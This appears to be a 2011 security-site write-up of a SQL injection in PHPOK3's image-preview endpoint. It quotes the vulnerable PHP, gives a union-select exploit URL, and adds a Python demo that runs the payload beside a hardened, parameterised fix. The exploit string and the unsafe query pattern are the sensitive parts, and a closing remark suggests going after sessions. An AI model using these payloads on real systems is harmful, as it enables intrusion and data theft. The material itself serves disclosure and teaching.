PHPOK3 enterprise website-building program: SQL injection vulnerability warning

ID MYHACK58:62201128820
Type myhack58
Reporter 佚名 (anonymous)
Modified 2011-01-11T00:00:00


Author: jsbug. Original note: my friends keep climbing over my body on their way to DOTA super-god status. I saw someone on the forum mention phpok, so I used the weekend to serve up a kill on a plate; hope you can go super-god too.

phpok3/app/www/models/upfile.php:

    // Fetch image information by an ID string; here the thumbnail is what is retrieved
    function piclist($idstring="")
    {
        if(!$idstring)
        {
            return false;
        }
        // $idstring is concatenated unescaped into IN() and again into the quoted substring_index() argument
        $sql = "SELECT id,thumb url FROM ".$this->db->prefix."upfiles WHERE id IN(".$idstring.") ORDER BY substring_index('".$idstring."',id,1)";
        // Leftover debug output: the assembled query is printed into the response
        echo($sql);
        return $this->db->get_all($sql);
    }

The problem is in IN(); it is somewhat similar to the old Dz5.0 (Discuz! 5.0) pm.php vulnerability. phpok3/app/www/control/open.php:

    // Preview an image via Ajax
    function ajax_preview_img_f()
    {
        // Here only anti-cross-site filtering is done, and it is weak; nothing is done for SQL
        $idstring = $this->trans_lib->safe("idstring");
        if(!$idstring)
        {
            exit("empty");
        }
        // Passed straight through to the model
        $rslist = $this->upfile_m->piclist($idstring);
        sys_html2js($this->json_lib->encode($rslist));
    }

There are several more of the same type; they will not be repeated here. Attached exploit (Exp):

    http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23

The %23 is a URL-encoded `#`, which comments out the rest of the query, including the second copy of idstring inside substring_index('...'), so the unbalanced quote and parenthesis there never reach the parser. The union supplies the same two columns the original SELECT returns, and the echo($sql) left in piclist() prints the assembled query back in the response, which makes adjusting the payload trivial.
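To make the mechanics concrete, the following is an added example, not phpok3 code: it re-creates piclist() in Python against an in-memory SQLite table, runs the page's payload against it, and puts a hardened version beside it. The table rows are constructed. Because SQLite is used instead of MySQL, `sqlite_version()` stands in for `version()`, `--` stands in for the `#` (%23) comment marker, and `instr()` stands in for `substring_index()` in the ORDER BY tail that the comment has to neutralise. The hardened version whitelists the id list, binds every id as a parameter, and restores the requested order in application code rather than in SQL.

```python
import re
import sqlite3

# Constructed stand-in for the phpok3 `upfiles` table (not real phpok3 data).
SAMPLE_ROWS = [
    (1, "/up/thumb_1.jpg", "/up/1.jpg"),
    (2, "/up/thumb_2.jpg", "/up/2.jpg"),
    (3, "/up/thumb_3.jpg", "/up/3.jpg"),
]

# The page's payload adapted to SQLite: sqlite_version() replaces MySQL's
# version(), and "--" replaces the "#" (%23) comment marker.
PAYLOAD = "0) union select 1,sqlite_version()--"


def make_demo_db():
    """In-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE upfiles (id INTEGER PRIMARY KEY, thumb TEXT, url TEXT)"
    )
    conn.executemany("INSERT INTO upfiles VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def piclist_vulnerable(conn, idstring=""):
    """Python rendering of phpok3's piclist(): the caller's string is pasted
    into IN(...) and again into the ORDER BY expression that preserves the
    requested order (instr() stands in for MySQL's substring_index())."""
    if not idstring:
        return False
    sql = ("SELECT id,thumb FROM upfiles WHERE id IN(" + idstring + ") "
           "ORDER BY instr('" + idstring + "', id)")
    return conn.execute(sql).fetchall()


# Whitelist: a comma-separated list of unsigned integers and nothing else.
ID_LIST = re.compile(r"[0-9]+(,[0-9]+)*")


def parse_id_list(idstring):
    """Return the ids as integers, or None when the string is not a plain
    id list (the payload above, an empty string, a quote, a space ...)."""
    if not idstring or not ID_LIST.fullmatch(idstring):
        return None
    return [int(x) for x in idstring.split(",")]


def piclist_safe(conn, idstring=""):
    """Hardened version: validate, bind each id as a parameter, and sort the
    rows into the requested order in Python instead of in SQL."""
    ids = parse_id_list(idstring)
    if ids is None:
        return []
    placeholders = ",".join("?" * len(ids))
    rows = conn.execute(
        "SELECT id,thumb FROM upfiles WHERE id IN(" + placeholders + ")", ids
    ).fetchall()
    position = {id_: n for n, id_ in enumerate(ids)}
    return sorted(rows, key=lambda row: position[row[0]])


if __name__ == "__main__":
    db = make_demo_db()
    print(piclist_vulnerable(db, "3,1"))    # rows 3 and 1, in that order
    print(piclist_vulnerable(db, PAYLOAD))  # [(1, '<sqlite version>')]: attacker's SELECT ran
    print(piclist_safe(db, "3,1"))          # same rows as the first call
    print(piclist_safe(db, PAYLOAD))        # []: rejected by the whitelist
```

Running it shows the payload producing a row whose id is the attacker's literal 1 and whose second column is the database version string, i.e. the injected SELECT executed and the ORDER BY tail was swallowed by the comment; the same string is rejected outright by `parse_id_list`. In the real PHP code the equivalent fix is to split `$idstring` on commas, cast each piece with `intval()`, drop anything that is not a positive integer, and rebuild the list before it touches the query.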

Passwords are MD5-hashed twice; of course you could also go straight for the session (didn't test it, just saying).